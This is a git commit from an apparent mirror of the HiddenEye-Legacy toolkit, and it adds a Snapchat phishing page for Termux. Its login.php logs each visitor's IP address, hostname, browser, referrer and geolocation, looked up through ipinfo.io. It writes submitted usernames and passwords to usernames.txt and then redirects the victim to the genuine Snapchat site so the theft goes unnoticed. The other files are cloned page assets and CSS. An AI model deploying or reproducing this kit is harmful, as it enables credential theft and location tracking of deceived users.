mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
snapchat added in termux socialfish webpages dir.
This commit is contained in:
parent
9e5d8380cf
commit
90d2029514
31
WebPagesTermux/Snapchat_web/Scripts/main.en-us.js
Normal file
31
WebPagesTermux/Snapchat_web/Scripts/main.en-us.js
Normal file
File diff suppressed because one or more lines are too long
265
WebPagesTermux/Snapchat_web/index.html
Normal file
265
WebPagesTermux/Snapchat_web/index.html
Normal file
File diff suppressed because one or more lines are too long
54
WebPagesTermux/Snapchat_web/login.php
Normal file
54
WebPagesTermux/Snapchat_web/login.php
Normal file
|
@ -0,0 +1,54 @@
|
|||
<?php
|
||||
// This program generates a web pages that gets
|
||||
// the user's information, saves it to a file,
|
||||
// and displays it on the web page.
|
||||
// Created by Anon UD4Y.
|
||||
// 19 Apr, 2018.
|
||||
|
||||
// Name of the ip address log.
|
||||
$outputWebBug = 'iplog.txt';
|
||||
|
||||
// Get the ip address and info about client.
|
||||
@ $details = json_decode(file_get_contents("http://ipinfo.io/{$_SERVER['REMOTE_ADDR']}/json"));
|
||||
@ $hostname=gethostbyaddr($_SERVER['REMOTE_ADDR']);
|
||||
|
||||
// Get the query string from the URL.
|
||||
$QUERY_STRING = preg_replace("%[^/a-zA-Z0-9@,_=]%", '', $_SERVER['QUERY_STRING']);
|
||||
|
||||
// Write the ip address and info to file.
|
||||
@ $fileHandle = fopen($outputWebBug, "a");
|
||||
if ($fileHandle)
|
||||
{
|
||||
$string ='INFORMATION_ACCESSED-------------------------------------------------------------------'
|
||||
.$QUERY_STRING.' [1]IP-ADDRESS = ' // everything after "?" in the URL
|
||||
.$_SERVER['REMOTE_ADDR'].' [2]HOSTNAME = ' // ip address
|
||||
.$hostname.' [3]BROWSER & SYSTEM = ' // hostname
|
||||
.$_SERVER['HTTP_USER_AGENT'].' [4]REDIRECTED-BY = ' // browser and operating system
|
||||
.$_SERVER['HTTP_REFERER'].' [5]LATITUDE-LONGITUDE = ' // where they got the link for this page
|
||||
.$details->loc.' [6]ISP = ' // latitude, longitude
|
||||
.$details->org.' [7]CITY = ' // internet service provider
|
||||
.$details->city.' [8]STATE = ' // city
|
||||
.$details->region.' [9]COUNTRY = ' // state
|
||||
.$details->country.' [10]DATE & TIME = ' // country
|
||||
.date("D dS M,Y h:i a").'________________________________________________[DONE BY AN0NUD4Y]' // date
|
||||
."\n"
|
||||
;
|
||||
$write = fputs($fileHandle, $string);
|
||||
@ fclose($fileHandle);
|
||||
}
|
||||
|
||||
|
||||
$var = $_POST['username'];
|
||||
$var2 = $_POST['password'];
|
||||
$myFile = file_get_contents("protect.html");
|
||||
$searchString = "<html><title>WELCOME</title></html>";
|
||||
if($myFile != $searchString) {
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND);
|
||||
header('Location:https://accounts.snapchat.com');
|
||||
}
|
||||
if($myFile != $searchString) {
|
||||
echo "LOGIN SUCCESSFULL";
|
||||
header('Location:https://accounts.snapchat.com');
|
||||
}
|
||||
exit();
|
||||
?>
|
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.eot
Normal file
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.eot
Normal file
Binary file not shown.
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.woff
Normal file
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.woff
Normal file
Binary file not shown.
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.woff2
Normal file
BIN
WebPagesTermux/Snapchat_web/styles/fonts/icons.woff2
Normal file
Binary file not shown.
11
WebPagesTermux/Snapchat_web/styles/semantic.min.css
vendored
Normal file
11
WebPagesTermux/Snapchat_web/styles/semantic.min.css
vendored
Normal file
File diff suppressed because one or more lines are too long
69
WebPagesTermux/Snapchat_web/styles/snapchat.css
Normal file
69
WebPagesTermux/Snapchat_web/styles/snapchat.css
Normal file
|
@ -0,0 +1,69 @@
|
|||
.snapchatFontThin {
|
||||
font-family: 'HelveticaNeue-Thin', 'HelveticaNeue-Light', 'Helvetica Neue Light', 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif;
|
||||
}
|
||||
|
||||
a {
|
||||
cursor: pointer;
|
||||
}
|
||||
|
||||
#navigationMenu {
|
||||
text-align: center;
|
||||
padding: 1rem;
|
||||
}
|
||||
#navigationMenu .button {
|
||||
width: 75%;
|
||||
max-width: 240px;
|
||||
}
|
||||
|
||||
#navigationMenuButton {
|
||||
float: right;
|
||||
}
|
||||
#navigationMenuButton img {
|
||||
width: 20px;
|
||||
}
|
||||
|
||||
.ui.snapchatHeader.stackable.grid .column {
|
||||
margin-top: 2rem !important;
|
||||
margin-bottom: 1rem;
|
||||
padding-top: 1rem !important;
|
||||
padding-bottom: 1rem;
|
||||
}
|
||||
.snapchatHeader .logo {
|
||||
width: 80px;
|
||||
}
|
||||
|
||||
.snapchatInvertedHeader h1 {
|
||||
text-align: center;
|
||||
}
|
||||
.snapchatInvertedHeader h1 .logo {
|
||||
padding-top: .5rem;
|
||||
width: 36px;
|
||||
}
|
||||
|
||||
|
||||
.snapchatBody.stackable.grid {
|
||||
padding-bottom: 5rem !important;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid {
|
||||
padding-top: 3rem;
|
||||
padding-bottom: 4rem;
|
||||
border-top: 1px solid #EEE;
|
||||
}
|
||||
|
||||
.snapchatFooter.stackable.grid h5 {
|
||||
text-transform: uppercase;
|
||||
}
|
||||
|
||||
.snapchatFooter .column {
|
||||
text-align: center;
|
||||
}
|
||||
|
||||
@font-face {
|
||||
font-family: 'Dropdown';
|
||||
src: url("fonts/icons.woff");
|
||||
format('truetype'), url("fonts/icons.woff");
|
||||
format('woff');
|
||||
font-weight: normal;
|
||||
font-style: normal;
|
||||
}
|
Loading…
Reference in New Issue
Block a user